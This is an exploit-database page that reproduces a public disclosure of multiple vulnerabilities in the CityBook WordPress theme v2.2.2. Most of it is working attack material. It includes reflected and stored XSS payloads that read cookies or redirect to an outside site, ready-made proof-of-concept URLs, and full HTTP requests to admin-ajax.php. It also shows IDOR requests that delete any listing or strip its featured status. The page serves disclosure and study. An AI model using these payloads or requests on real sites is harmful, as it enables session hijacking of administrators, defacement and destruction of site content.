Advertisement






CityBook - Directory & Listing WordPress Theme v2.2.2 Multiple Vulnerabilities

CVE Category Price Severity
CVE-2021-24201 CWE-79 Not specified High
Author Risk Exploitation Type Date
Ravera High Remote 2019-12-27
CPE
cpe:cpe:/a:wordpress:citybook_directory_amp_listing_theme:2.2.2
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019120112

Below is a copy:

CityBook - Directory & Listing WordPress Theme v2.2.2 Multiple Vulnerabilities
# Exploit Title: CityBook - Directory & Listing WordPress Theme v2.2.2 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/citybook/
# Date: 27/12/2019
# Exploit Author: m0ze
# Vendor Homepage: https://cththemes.com/
# Software Link: https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727
# Version: 2.2.2
# Tested on: Parrot OS
# CWE: 79


----[]- Info: -[]----
Demo website: https://citybook2.cththemes.com/


----[]- Reflected XSS: -[]----
Input field with placeholder What are you looking for? on the homepage is vulnerable. Any payload will be triggered three times if you use "> in front of it. Same thing with a regular search (block near website logo).

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=alert(document.domain)>
Payload Sample #2: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC #0: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E#038;location_search&nearby=off&address_lat&address_lng&distance=10&lcats%5B%5D=

PoC #1: https://citybook2.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=

PoC #2: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=


----[]- Persistent XSS -> Chat: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://citybook2.cththemes.com/dashboard/?dashboard=chats or from chat widget on the bottom right corner).

Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=chats
Cookie: _your_auth_cookies_here_

action=citybook_addons_chat_reply&_nonce=x75ac6299d&cid=1020&user_id=XXX&touid=1&reply_text=_payload_

Where:
user_id=XXX (your unique WordPress ID);
touid=1 (message receiver ID, in this example ID 1 == account admin);
reply_text=_payload_ (your payload text).


----[]- Persistent Self-XSS -> Profile: -[]----
Vulnerable input fields: Phone and Address (will be triggered only on https://citybook2.cththemes.com/dashboard/?dashboard=profile page for current user).

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>


----[]- Persistent XSS -> Listing page: -[]----
Add new listing here https://citybook2.cththemes.com/submit/ (first time you need to order a Free plan and go to this URL again).
Vulnerable input fields: Listing Address, Listing Latitude, Listing Longitude, Email Address, Description. Trainers section: Add Member option with Name, Job or Position and Description vulnerable input fields. Additional Services Fees section: Add Service option with Service Name vulnerable input field. Listing Address payload also works on the admin dashboard, so it's possible to steal administrator cookies.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>

PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 5848
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/edit-listing/?listing_id=XXXX
Cookie: _your_auth_cookies_here_

-----------------------------18467633426500
Content-Disposition: form-data; name="lid"

XXXX
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_type_id"

4901
-----------------------------18467633426500
Content-Disposition: form-data; name="isSubmit"

true
-----------------------------18467633426500
Content-Disposition: form-data; name="hasError"

false
-----------------------------18467633426500
Content-Disposition: form-data; name="title"

PoC
-----------------------------18467633426500
Content-Disposition: form-data; name="content"

<p><h1 style="font-size:68px;background:black;color:red;">Greetings from m0ze</h1></p>

-----------------------------18467633426500
Content-Disposition: form-data; name="thumbnail[0]"


-----------------------------18467633426500
Content-Disposition: form-data; name="cats[0]"

50
-----------------------------18467633426500
Content-Disposition: form-data; name="tags"


-----------------------------18467633426500
Content-Disposition: form-data; name="locations"

US|
-----------------------------18467633426500
Content-Disposition: form-data; name="features[0]"

64
-----------------------------18467633426500
Content-Disposition: form-data; name="features[1]"

84
-----------------------------18467633426500
Content-Disposition: form-data; name="features[2]"

66
-----------------------------18467633426500
Content-Disposition: form-data; name="features[3]"

76
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[timezone]"

America/New_York
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Monday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Tuesday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Wednesday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Thursday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Friday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Saturday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Sunday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="ltags_names"

m0ze
-----------------------------18467633426500
Content-Disposition: form-data; name="post_excerpt"

"><h1>Greetings from m0ze</h1>
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_address"

<!--<img src="--><img src=x onerror=(alert)(`m0zeAddr`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_latitude"

<!--<img src="--><img src=x onerror=(alert)(`m0zeLat`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_longitude"

<!--<img src="--><img src=x onerror=(alert)(`m0zeLng`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="gmap"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_email"

<!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_phone"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_website"


-----------------------------18467633426500
Content-Disposition: form-data; name="price_range"

moderate
-----------------------------18467633426500
Content-Disposition: form-data; name="price_from"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="price_to"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates"


-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates_show_metas"


-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_id]"

--imgsrc---imgsrcxonerroralertm0ze88-
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_name]"

<!--<img src="--><img src=x onerror=(alert)(`ServiceName`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_desc]"


-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_price]"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][name]"

<!--<img src="--><img src=x onerror=(alert)(`Membername`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][job]"

<!--<img src="--><img src=x onerror=(alert)(`MemberJob`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][desc]"

<!--<img src="--><img src=x onerror=(alert)(`MemberDesc`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="action"

submit_listing
-----------------------------18467633426500
Content-Disposition: form-data; name="_wpnonce"

02b218f88a
-----------------------------18467633426500--


----[]- IDOR #0: -[]----
Delete any post/page/listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: _your_auth_cookies_here_

lid=XXXX&action=citybook_addons_delete_listing&_nonce=xxb1891cee&_wpnonce=xxb1891cee

Where:
lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).


----[]- IDOR #1: -[]----
Remove the Featured option for any listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: _your_auth_cookies_here_

lid=XXXX&lfeatured=true&action=citybook_addons_featured_listing&_nonce=xxb1891cee&_wpnonce=xxb1891cee

Where:
lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.